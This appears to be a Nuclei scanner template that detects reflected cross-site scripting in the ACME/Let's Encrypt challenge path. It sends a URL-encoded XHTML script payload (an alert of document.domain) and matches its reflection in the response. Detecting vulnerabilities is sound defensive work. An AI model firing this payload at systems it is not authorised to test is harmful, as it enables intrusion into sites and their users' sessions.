id: acme-xss

info:
  name: ACME / Let's Encrypt Reflected XSS
  author: pdteam
  severity: medium
  tags: xss,acme

requests:
  - method: GET
    path:
      - '{{BaseURL}}/.well-known/acme-challenge/%3C%3fxml%20version=%221.0%22%3f%3E%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%3Ealert%28document.domain%26%23x29%3B%3C/x:script%3E'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<?xml version=\"1.0\"?><x:script xmlns:x=\"http://www.w3.org/1999/xhtml\">alert(document.domain&#x29;</x:script>"
      - type: word
        words:
          - "/xml"
          - "/html"